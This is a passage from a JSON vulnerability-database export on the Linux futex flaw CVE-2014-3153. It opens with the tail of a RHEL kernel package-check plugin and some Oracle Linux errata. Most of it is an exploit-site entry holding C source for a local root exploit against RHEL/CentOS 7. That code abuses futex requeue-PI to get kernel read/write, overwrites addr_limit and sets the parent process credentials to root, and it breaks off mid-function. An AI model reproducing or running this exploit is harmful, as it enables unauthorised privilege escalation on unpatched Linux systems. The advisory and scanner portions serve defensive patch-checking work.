reference:\"kernel-debug-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"kernel-debug-debuginfo-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"kernel-debug-devel-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-debug-devel-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"kernel-debuginfo-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-debuginfo-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"kernel-debuginfo-common-i686-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"kernel-devel-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-devel-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-doc-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-firmware-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"kernel-headers-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-headers-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-kdump-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-kdump-devel-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"perf-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"perf-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perf-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"perf-debuginfo-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"perf-debuginfo-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"perf-debuginfo-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"python-perf-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"python-perf-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"python-perf-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"python-perf-debuginfo-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"python-perf-debuginfo-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-2.6.32-358.46.1.el6\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debug / kernel-debug-debuginfo / kernel-debug-devel / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:31", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3153"], "description": "kernel-uek\n[3.8.13-35.1.1.el6uek]\n- futex: Make lookup_pi_state more robust (Thomas Gleixner) [Orabug: 18918552] {CVE-2014-3153}\n- futex: Always cleanup owner tid in unlock_pi (Thomas Gleixner) [Orabug: 18918552] {CVE-2014-3153}\n- futex: Validate atomic acquisition in futex_lock_pi_atomic() (Thomas Gleixner) [Orabug: 18918552] {CVE-2014-3153}\n- futex: Forbid uaddr == uaddr2 in futex_requeue(..., requeue_pi=1) (Thomas Gleixner) [Orabug: 18918552] {CVE-2014-3153} {CVE-2014-3153}", "edition": 4, "modified": "2014-06-06T00:00:00", "published": "2014-06-06T00:00:00", "id": "ELSA-2014-3037", "href": "http://linux.oracle.com/errata/ELSA-2014-3037.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:54", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3153"], "description": "kernel-uek\n[2.6.32-400.36.2uek]\n- futex: Make lookup_pi_state more robust (Thomas Gleixner) [Orabug: 18918736] {CVE-2014-3153}\n- futex: Always cleanup owner tid in unlock_pi (Thomas Gleixner) [Orabug: 18918736] {CVE-2014-3153}\n- futex: Validate atomic acquisition in futex_lock_pi_atomic() (Thomas Gleixner) [Orabug: 18918736] {CVE-2014-3153}\n- futex: Forbid uaddr1 == uaddr2 in futex_requeue(..., requeue_pi=1) (Thomas Gleixner) [Orabug: 18918736] {CVE-2014-3153} {CVE-2014-3153}", "edition": 4, "modified": "2014-06-07T00:00:00", "published": "2014-06-07T00:00:00", "id": "ELSA-2014-3039", "href": "http://linux.oracle.com/errata/ELSA-2014-3039.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:53", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3153"], "description": "[2.6.39-400.215.2]\n- futex: Make lookup_pi_state more robust (Thomas Gleixner) [Orabug: 18918614] {CVE-2014-3153}\n- futex: Always cleanup owner tid in unlock_pi (Thomas Gleixner) [Orabug: 18918614] {CVE-2014-3153}\n- futex: Validate atomic acquisition in futex_lock_pi_atomic() (Thomas Gleixner) [Orabug: 18918614] {CVE-2014-3153}\n- futex: Forbid uaddr1 == uaddr2 in futex_requeue(..., requeue_pi=1) (Thomas Gleixner) [Orabug: 18918614] {CVE-2014-3153} {CVE-2014-3153}", "edition": 4, "modified": "2014-06-07T00:00:00", "published": "2014-06-07T00:00:00", "id": "ELSA-2014-3038", "href": "http://linux.oracle.com/errata/ELSA-2014-3038.html", "title": "unbreakable enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-01-03T17:25:46", "edition": 2, "description": "Exploit for linux platform in category local exploits", "published": "2014-11-26T00:00:00", "type": "zdt", "title": "Linux Kernel libfutex Local Root for RHEL/CentOS 7.0.1406 Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3153"], "modified": "2014-11-26T00:00:00", "id": "1337DAY-ID-22925", "href": "https://0day.today/exploit/description/22925", "sourceData": "/*\r\n * CVE-2014-3153 exploit for RHEL/CentOS 7.0.1406\r\n * By Kaiqu Chen ( [email\u00a0protected] )\r\n * Based on libfutex and the expoilt for Android by GeoHot.\r\n *\r\n * Usage:\r\n * $gcc exploit.c -o exploit -lpthread\r\n * $./exploit\r\n *\r\n */\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <stdbool.h>\r\n#include <pthread.h>\r\n#include <fcntl.h>\r\n#include <signal.h>\r\n#include <string.h>\r\n#include <errno.h>\r\n#include <linux/futex.h>\r\n#include <sys/socket.h>\r\n#include <sys/mman.h>\r\n#include <sys/syscall.h>\r\n#include <sys/resource.h>\r\n#include <arpa/inet.h>\r\n#include <netinet/in.h> \r\n#include <netinet/tcp.h> \r\n \r\n#define ARRAY_SIZE(a) (sizeof (a) / sizeof (*(a)))\r\n \r\n#define FUTEX_WAIT_REQUEUE_PI 11\r\n#define FUTEX_CMP_REQUEUE_PI 12\r\n#define USER_PRIO_BASE 120\r\n#define LOCAL_PORT 5551\r\n \r\n#define SIGNAL_HACK_KERNEL 12\r\n#define SIGNAL_THREAD_EXIT 10\r\n \r\n#define OFFSET_PID 0x4A4\r\n#define OFFSET_REAL_PARENT 0x4B8\r\n#define OFFSET_CRED 0x668\r\n \r\n#define SIZEOF_CRED 160\r\n#define SIZEOF_TASK_STRUCT 2912\r\n#define OFFSET_ADDR_LIMIT 0x20\r\n \r\n#define PRIO_LIST_OFFSET 8 \r\n#define NODE_LIST_OFFSET (PRIO_LIST_OFFSET + sizeof(struct list_head))\r\n#define PRIO_LIST_TO_WAITER(list) (((void *)(list)) - PRIO_LIST_OFFSET)\r\n#define WAITER_TO_PRIO_LIST(waiter) (((void *)(waiter)) + PRIO_LIST_OFFSET)\r\n#define NODE_LIST_TO_WAITER(list) (((void *)(list)) - NODE_LIST_OFFSET)\r\n#define WAITER_TO_NODE_LIST(waiter) (((void *)(waiter)) + NODE_LIST_OFFSET)\r\n#define MUTEX_TO_PRIO_LIST(mutex) (((void *)(mutex)) + sizeof(long))\r\n#define MUTEX_TO_NODE_LIST(mutex) (((void *)(mutex)) + sizeof(long) + sizeof(struct list_head))\r\n \r\n////////////////////////////////////////////////////////////////////\r\nstruct task_struct;\r\n \r\nstruct thread_info {\r\n struct task_struct *task;\r\n void *exec_domain;\r\n int flags;\r\n int status;\r\n int cpu;\r\n int preempt_count;\r\n void *addr_limit;\r\n};\r\n \r\nstruct list_head {\r\n struct list_head *next;\r\n struct list_head *prev;\r\n};\r\n \r\nstruct plist_head {\r\n struct list_head node_list;\r\n};\r\n \r\nstruct plist_node {\r\n int prio;\r\n struct list_head prio_list;\r\n struct list_head node_list;\r\n};\r\n \r\nstruct rt_mutex {\r\n unsigned long wait_lock;\r\n struct plist_head wait_list;\r\n struct task_struct *owner;\r\n};\r\n \r\nstruct rt_mutex_waiter {\r\n struct plist_node list_entry;\r\n struct plist_node pi_list_entry;\r\n struct task_struct *task;\r\n struct rt_mutex *lock;\r\n};\r\n \r\nstruct mmsghdr {\r\n struct msghdr msg_hdr;\r\n unsigned int msg_len;\r\n};\r\n \r\nstruct cred {\r\n int usage;\r\n int uid; /* real UID of the task */\r\n int gid; /* real GID of the task */\r\n int suid; /* saved UID of the task */\r\n int sgid; /* saved GID of the task */\r\n int euid; /* effective UID of the task */\r\n int egid; /* effective GID of the task */\r\n int fsuid; /* UID for VFS ops */\r\n int fsgid; /* GID for VFS ops */\r\n};\r\n \r\n////////////////////////////////////////////////////////////////////\r\n \r\nstatic int swag = 0;\r\nstatic int swag2 = 0;\r\nstatic int main_pid;\r\n \r\nstatic pid_t waiter_thread_tid;\r\n \r\nstatic pthread_mutex_t hacked_lock;\r\nstatic pthread_cond_t hacked;\r\n \r\nstatic pthread_mutex_t done_lock;\r\nstatic pthread_cond_t done;\r\n \r\nstatic pthread_mutex_t is_thread_desched_lock;\r\nstatic pthread_cond_t is_thread_desched;\r\n \r\nstatic volatile int do_socket_tid_read = 0;\r\nstatic volatile int did_socket_tid_read = 0;\r\n \r\nstatic volatile int do_dm_tid_read = 0;\r\nstatic volatile int did_dm_tid_read = 0;\r\n \r\nstatic pid_t last_tid = 0;\r\n \r\nstatic volatile int_sync_time_out = 0;\r\n \r\nstruct thread_info thinfo;\r\nchar task_struct_buf[SIZEOF_TASK_STRUCT];\r\nstruct cred cred_buf;\r\n \r\nstruct thread_info *hack_thread_stack = NULL;\r\n \r\npthread_t thread_client_to_setup_rt_waiter;\r\n \r\nint listenfd;\r\nint sockfd;\r\nint clientfd;\r\n \r\n////////////////////////////////////////////////////////////////\r\nint gettid()\r\n{\r\n return syscall(__NR_gettid);\r\n}\r\n \r\nssize_t read_pipe(void *kbuf, void *ubuf, size_t count) {\r\n int pipefd[2];\r\n ssize_t len;\r\n \r\n pipe(pipefd);\r\n \r\n len = write(pipefd[1], kbuf, count);\r\n \r\n if (len != count) {\r\n printf(\"Thread %d failed in reading @ %p : %d %d\\n\", gettid(), kbuf, (int)len, errno);\r\n while(1) { sleep(10); }\r\n }\r\n \r\n read(pipefd[0], ubuf, count);\r\n \r\n close(pipefd[0]);\r\n close(pipefd[1]);\r\n \r\n return len;\r\n}\r\n \r\nssize_t write_pipe(void *kbuf, void *ubuf, size_t count) {\r\n int pipefd[2];\r\n ssize_t len;\r\n \r\n pipe(pipefd);\r\n \r\n write(pipefd[1], ubuf, count);\r\n len = read(pipefd[0], kbuf, count);\r\n \r\n if (len != count) {\r\n printf(\"Thread %d failed in writing @ %p : %d %d\\n\", gettid(), kbuf, (int)len, errno);\r\n while(1) { sleep(10); }\r\n }\r\n \r\n close(pipefd[0]);\r\n close(pipefd[1]);\r\n \r\n return len;\r\n}\r\n \r\nint pthread_cancel_immediately(pthread_t thid)\r\n{\r\n pthread_kill(thid, SIGNAL_THREAD_EXIT);\r\n pthread_join(thid, NULL);\r\n return 0;\r\n}\r\n \r\nvoid set_addr_limit(void *sp)\r\n{\r\n long newlimit = -1;\r\n write_pipe(sp + OFFSET_ADDR_LIMIT, (void *)&newlimit, sizeof(long));\r\n}\r\n \r\nvoid set_cred(struct cred *kcred)\r\n{\r\n struct cred cred_buf;\r\n int len;\r\n \r\n len = read_pipe(kcred, &cred_buf, sizeof(cred_buf));\r\n cred_buf.uid = cred_buf.euid = cred_buf.suid = cred_buf.fsuid = 0;\r\n cred_buf.gid = cred_buf.egid = cred_buf.sgid = cred_buf.fsgid = 0;\r\n len = write_pipe(kcred, &cred_buf, sizeof(cred_buf));\r\n}\r\n \r\nstruct rt_mutex_waiter *pwaiter11;\r\n \r\nvoid set_parent_cred(void *sp, int parent_tid)\r\n{\r\n int len;\r\n int tid;\r\n struct task_struct *pparent;\r\n struct cred *pcred;\r\n \r\n set_addr_limit(sp);\r\n \r\n len = read_pipe(sp, &thinfo, sizeof(thinfo));\r\n if(len != sizeof(thinfo)) {\r\n printf(\"Read %p error %d\\n\", sp, len);\r\n }\r\n \r\n void *ptask = thinfo.task;\r\n len = read_pipe(ptask, task_struct_buf, SIZEOF_TASK_STRUCT);\r\n tid = *(int *)(task_struct_buf + OFFSET_PID);\r\n \r\n while(tid != 0 && tid != parent_tid) {\r\n pparent = *(struct task_struct **)(task_struct_buf + OFFSET_REAL_PARENT);\r\n len = read_pipe(pparent, task_struct_buf, SIZEOF_TASK_STRUCT);\r\n tid = *(int *)(task_struct_buf + OFFSET_PID);\r\n }\r\n \r\n if(tid == parent_tid) {\r\n pcred = *(struct cred **)(task_struct_buf + OFFSET_CRED);\r\n set_cred(pcred);\r\n } else\r\n printf(\"Pid %d not found\\n\", parent_tid);\r\n return;\r\n}\r\n \r\nstatic int read_voluntary_ctxt_switches(pid_t pid)\r\n{\r\n char filename[256];\r\n FILE *fp;\r\n int vcscnt = -1;\r\n \r\n sprintf(filename, \"/proc/self/task/%d/status\", pid);\r\n fp = fopen(filename, \"rb\");\r\n if (fp) {\r\n char filebuf[4096];\r\n char *pdest;\r\n fread(filebuf, 1, sizeof filebuf, fp);\r\n pdest = strstr(filebuf, \"voluntary_ctxt_switches\");\r\n vcscnt = atoi(pdest + 0x19);\r\n fclose(fp);\r\n }\r\n return vcscnt;\r\n}\r\n \r\nstatic void sync_timeout_task(int sig)\r\n{\r\n int_sync_time_out = 1;\r\n}\r\n \r\nstatic int sync_with_child_getchar(pid_t pid, int volatile *do_request, int volatile *did_request)\r\n{\r\n while (*do_request == 0) { }\r\n printf(\"Press RETURN after one second...\");\r\n *did_request = 1;\r\n getchar();\r\n return 0;\r\n}\r\n \r\nstatic int sync_with_child(pid_t pid, int volatile *do_request, int volatile *did_request)\r\n{\r\n struct sigaction act;\r\n int vcscnt;\r\n int_sync_time_out = 0;\r\n \r\n act.sa_handler = sync_timeout_task;\r\n sigemptyset(&act.sa_mask);\r\n act.sa_flags = 0;\r\n act.sa_restorer = NULL;\r\n sigaction(SIGALRM, &act, NULL);\r\n \r\n alarm(3);\r\n while (*do_request == 0) {\r\n if (int_sync_time_out)\r\n return -1;\r\n }\r\n \r\n alarm(0);\r\n vcscnt = read_voluntary_ctxt_switches(pid);\r\n *did_request = 1;\r\n while (read_voluntary_ctxt_switches(pid) != vcscnt + 1) {\r\n usleep(10);\r\n }\r\n \r\n return 0;\r\n}\r\n \r\nstatic void sync_with_parent(int volatile *do_request, int volatile *did_request)\r\n{\r\n *do_request = 1;\r\n while (*did_request == 0) { }\r\n}\r\n \r\nvoid fix_rt_mutex_waiter_list(struct rt_mutex *pmutex)\r\n{\r\n struct rt_mutex_waiter *pwaiter6, *pwaiter7;\r\n struct rt_mutex_waiter waiter6, waiter7;\r\n struct rt_mutex mutex;\r\n if(!pmutex)\r\n return;\r\n read_pipe(pmutex, &mutex, sizeof(mutex));\r\n pwaiter6 = NODE_LIST_TO_WAITER(mutex.wait_list.node_list.next);\r\n if(!pwaiter6)\r\n return;\r\n read_pipe(pwaiter6, &waiter6, sizeof(waiter6));\r\n pwaiter7 = NODE_LIST_TO_WAITER(waiter6.list_entry.node_list.next);\r\n if(!pwaiter7)\r\n return;\r\n read_pipe(pwaiter7, &waiter7, sizeof(waiter7));\r\n \r\n waiter6.list_entry.prio_list.prev = waiter6.list_entry.prio_list.next;\r\n waiter7.list_entry.prio_list.next = waiter7.list_entry.prio_list.prev;\r\n mutex.wait_list.node_list.prev = waiter6.list_entry.node_list.next;\r\n waiter7.list_entry.node_list.next = waiter6.list_entry.node_list.prev;\r\n \r\n write_pipe(pmutex, &mutex, sizeof(mutex));\r\n write_pipe(pwaiter6, &waiter6, sizeof(waiter6));\r\n write_pipe(pwaiter7, &waiter7, sizeof(waiter7));\r\n}\r\n \r\nstatic void void_handler(int signum)\r\n{\r\n pthread_exit(0);\r\n}\r\n \r\nstatic void kernel_hack_task(int signum)\r\n{\r\n struct rt_mutex *prt_mutex, rt_mutex;\r\n struct rt_mutex_waiter rt_waiter11;\r\n int tid = syscall(__NR_gettid);\r\n int pid = getpid();\r\n \r\n set_parent_cred(hack_thread_stack, main_pid);\r\n \r\n read_pipe(pwaiter11, (void *)&rt_waiter11, sizeof(rt_waiter11));\r\n \r\n prt_mutex = rt_waiter11.lock;\r\n read_pipe(prt_mutex, (void *)&rt_mutex, sizeof(rt_mutex));\r\n \r\n void *ptask_struct = rt_mutex.owner;\r\n ptask_struct = (void *)((long)ptask_struct & ~ 0xF);\r\n int len = read_pipe(ptask_struct, task_struct_buf, SIZEOF_TASK_STRUCT);\r\n int *ppid = (int *)(task_struct_buf + OFFSET_PID);\r\n void **pstack = (void **)&task_struct_buf[8];\r\n void *owner_sp = *pstack;\r\n set_addr_limit(owner_sp);\r\n \r\n pthread_mutex_lock(&hacked_lock);\r\n pthread_cond_signal(&hacked);\r\n pthread_mutex_unlock(&hacked_lock);\r\n}\r\n \r\nstatic void *call_futex_lock_pi_with_priority(void *arg)\r\n{\r\n int prio;\r\n struct sigaction act;\r\n int ret;\r\n \r\n prio = (long)arg;\r\n last_tid = syscall(__NR_gettid);\r\n \r\n pthread_mutex_lock(&is_thread_desched_lock);\r\n pthread_cond_signal(&is_thread_desched);\r\n \r\n act.sa_handler = void_handler;\r\n sigemptyset(&act.sa_mask);\r\n act.sa_flags = 0;\r\n act.sa_restorer = NULL;\r\n sigaction(SIGNAL_THREAD_EXIT, &act, NULL);\r\n \r\n act.sa_handler = kernel_hack_task;\r\n sigemptyset(&act.sa_mask);\r\n act.sa_flags = 0;\r\n act.sa_restorer = NULL;\r\n sigaction(SIGNAL_HACK_KERNEL, &act, NULL);\r\n \r\n setpriority(PRIO_PROCESS, 0, prio);\r\n \r\n pthread_mutex_unlock(&is_thread_desched_lock);\r\n \r\n sync_with_parent(&do_dm_tid_read, &did_dm_tid_read);\r\n \r\n ret = syscall(__NR_futex, &swag2, FUTEX_LOCK_PI, 1, 0, NULL, 0);\r\n \r\n return NULL;\r\n}\r\n \r\nstatic pthread_t create_thread_do_futex_lock_pi_with_priority(int prio)\r\n{\r\n pthread_t th4;\r\n pid_t pid;\r\n \r\n do_dm_tid_read = 0;\r\n did_dm_tid_read = 0;\r\n \r\n pthread_mutex_lock(&is_thread_desched_lock);\r\n pthread_create(&th4, 0, call_futex_lock_pi_with_priority, (void *)(long)prio);\r\n pthread_cond_wait(&is_thread_desched, &is_thread_desched_lock);\r\n \r\n pid = last_tid;\r\n \r\n sync_with_child(pid, &do_dm_tid_read, &did_dm_tid_read);\r\n \r\n pthread_mutex_unlock(&is_thread_desched_lock);\r\n \r\n return th4;\r\n}\r\n \r\nstatic int server_for_setup_rt_waiter(void)\r\n{\r\n int sockfd;\r\n int yes = 1;\r\n struct sockaddr_in addr = {0};\r\n \r\n sockfd = socket(AF_INET, SOCK_STREAM, SOL_TCP);\r\n \r\n setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, (char *)&yes, sizeof(yes));\r\n \r\n addr.sin_family = AF_INET;\r\n addr.sin_port = htons(LOCAL_PORT);\r\n addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\r\n bind(sockfd, (struct sockaddr *)&addr, sizeof(addr));\r\n \r\n listen(sockfd, 1);\r\n listenfd = sockfd;\r\n \r\n return accept(sockfd, NULL, NULL);\r\n}\r\n \r\nstatic int connect_server_socket(void)\r\n{\r\n int sockfd;\r\n struct sockaddr_in addr = {0};\r\n int ret;\r\n int sock_buf_size;\r\n \r\n sockfd = socket(AF_INET, SOCK_STREAM, SOL_TCP);\r\n if (sockfd < 0) {\r\n printf(\"socket failed\\n\");\r\n usleep(10);\r\n } else {\r\n addr.sin_family = AF_INET;\r\n addr.sin_port = htons(LOCAL_PORT);\r\n addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\r\n }\r\n \r\n while (connect(sockfd, (struct sockaddr *)&addr, 16) < 0) {\r\n usleep(10);\r\n }\r\n \r\n sock_buf_size = 1;\r\n setsockopt(sockfd, SOL_SOCKET, SO_SNDBUF, (char *)&sock_buf_size, sizeof(sock_buf_size));\r\n \r\n return sockfd;\r\n}\r\n \r\nunsigned long iov_base0, iov_basex;\r\nsize_t iov_len0, iov_lenx;\r\n \r\nstatic void *client_to_setup_rt_waiter(void *waiter_plist)\r\n{\r\n int sockfd;\r\n struct mmsghdr msgvec[1];\r\n struct iovec msg_iov[8];\r\n unsigned long databuf[0x20];\r\n int i;\r\n int ret;\r\n struct sigaction act;\r\n \r\n act.sa_handler = void_handler;\r\n sigemptyset(&act.sa_mask);\r\n act.sa_flags = 0;\r\n act.sa_restorer = NULL;\r\n sigaction(SIGNAL_THREAD_EXIT, &act, NULL);\r\n \r\n waiter_thread_tid = syscall(__NR_gettid);\r\n setpriority(PRIO_PROCESS, 0, 12);\r\n \r\n sockfd = connect_server_socket();\r\n clientfd = sockfd;\r\n \r\n for (i = 0; i < ARRAY_SIZE(databuf); i++) {\r\n databuf[i] = (unsigned long)waiter_plist;\r\n }\r\n \r\n for (i = 0; i < ARRAY_SIZE(msg_iov); i++) {\r\n msg_iov[i].iov_base = waiter_plist;\r\n msg_iov[i].iov_len = (long)waiter_plist;\r\n }\r\n msg_iov[1].iov_base = (void *)iov_base0;\r\n \r\n msgvec[0].msg_hdr.msg_name = databuf;\r\n msgvec[0].msg_hdr.msg_namelen = sizeof databuf;\r\n msgvec[0].msg_hdr.msg_iov = msg_iov;\r\n msgvec[0].msg_hdr.msg_iovlen = ARRAY_SIZE(msg_iov);\r\n msgvec[0].msg_hdr.msg_control = databuf;\r\n msgvec[0].msg_hdr.msg_controllen = ARRAY_SIZE(databuf);\r\n msgvec[0].msg_hdr.msg_flags = 0;\r\n msgvec[0].msg_len = 0;\r\n \r\n syscall(__NR_futex, &swag, FUTEX_WAIT_REQUEUE_PI, 0, 0, &swag2, 0);\r\n \r\n sync_with_parent(&do_socket_tid_read, &did_socket_tid_read);\r\n \r\n ret = 0;\r\n \r\n while (1) {\r\n ret = syscall(__NR_sendmmsg, sockfd, msgvec, 1, 0);\r\n if (ret <= 0) {\r\n break;\r\n } else\r\n printf(\"sendmmsg ret %d\\n\", ret);\r\n }\r\n return NULL;\r\n}\r\n \r\nstatic void plist_set_next(struct list_head *node, struct list_head *head)\r\n{\r\n node->next = head;\r\n head->prev = node;\r\n node->prev = head;\r\n head->next = node;\r\n}\r\n \r\nstatic void setup_waiter_params(struct rt_mutex_waiter *rt_waiters)\r\n{\r\n rt_waiters[0].list_entry.prio = USER_PRIO_BASE + 9;\r\n rt_waiters[1].list_entry.prio = USER_PRIO_BASE + 13;\r\n plist_set_next(&rt_waiters[0].list_entry.prio_list, &rt_waiters[1].list_entry.prio_list);\r\n plist_set_next(&rt_waiters[0].list_entry.node_list, &rt_waiters[1].list_entry.node_list);\r\n}\r\n \r\nstatic bool do_exploit(void *waiter_plist)\r\n{\r\n void *magicval, *magicval2;\r\n struct rt_mutex_waiter *rt_waiters;\r\n pid_t pid;\r\n pid_t pid6, pid7, pid12, pid11;\r\n \r\n rt_waiters = PRIO_LIST_TO_WAITER(waiter_plist);\r\n \r\n syscall(__NR_futex, &swag2, FUTEX_LOCK_PI, 1, 0, NULL, 0);\r\n \r\n while (syscall(__NR_futex, &swag, FUTEX_CMP_REQUEUE_PI, 1, 0, &swag2, swag) != 1) {\r\n usleep(10);\r\n }\r\n \r\n pthread_t th6 = create_thread_do_futex_lock_pi_with_priority(6);\r\n pthread_t th7 = create_thread_do_futex_lock_pi_with_priority(7);\r\n \r\n swag2 = 0;\r\n do_socket_tid_read = 0;\r\n did_socket_tid_read = 0;\r\n \r\n syscall(__NR_futex, &swag2, FUTEX_CMP_REQUEUE_PI, 1, 0, &swag2, swag2);\r\n \r\n if (sync_with_child_getchar(waiter_thread_tid, &do_socket_tid_read, &did_socket_tid_read) < 0) {\r\n return false;\r\n }\r\n \r\n setup_waiter_params(rt_waiters);\r\n magicval = rt_waiters[0].list_entry.prio_list.next;\r\n printf(\"Checking whether exploitable..\");\r\n pthread_t th11 = create_thread_do_futex_lock_pi_with_priority(11);\r\n \r\n if (rt_waiters[0].list_entry.prio_list.next == magicval) {\r\n printf(\"failed\\n\");\r\n return false;\r\n }\r\n printf(\"OK\\nSeaching good magic...\\n\");\r\n magicval = rt_waiters[0].list_entry.prio_list.next;\r\n \r\n pthread_cancel_immediately(th11);\r\n \r\n pthread_t th11_1, th11_2;\r\n while(1) {\r\n setup_waiter_params(rt_waiters);\r\n th11_1 = create_thread_do_futex_lock_pi_with_priority(11);\r\n magicval = rt_waiters[0].list_entry.prio_list.next;\r\n hack_thread_stack = (struct thread_info *)((unsigned long)magicval & 0xffffffffffffe000);\r\n rt_waiters[1].list_entry.node_list.prev = (void *)&hack_thread_stack->addr_limit;\r\n \r\n th11_2 = create_thread_do_futex_lock_pi_with_priority(11);\r\n magicval2 = rt_waiters[1].list_entry.node_list.prev;\r\n \r\n printf(\"magic1=%p magic2=%p\\n\", magicval, magicval2);\r\n if(magicval < magicval2) {\r\n printf(\"Good magic found\\nHacking...\\n\");\r\n break;\r\n } else {\r\n pthread_cancel_immediately(th11_1);\r\n pthread_cancel_immediately(th11_2);\r\n } \r\n }\r\n pwaiter11 = NODE_LIST_TO_WAITER(magicval2);\r\n pthread_mutex_lock(&hacked_lock);\r\n pthread_kill(th11_1, SIGNAL_HACK_KERNEL);\r\n pthread_cond_wait(&hacked, &hacked_lock);\r\n pthread_mutex_unlock(&hacked_lock);\r\n close(listenfd);\r\n \r\n struct rt_mutex_waiter waiter11;\r\n struct rt_mutex *pmutex;\r\n int len = read_pipe(pwaiter11, &waiter11, sizeof(waiter11));\r\n if(len != 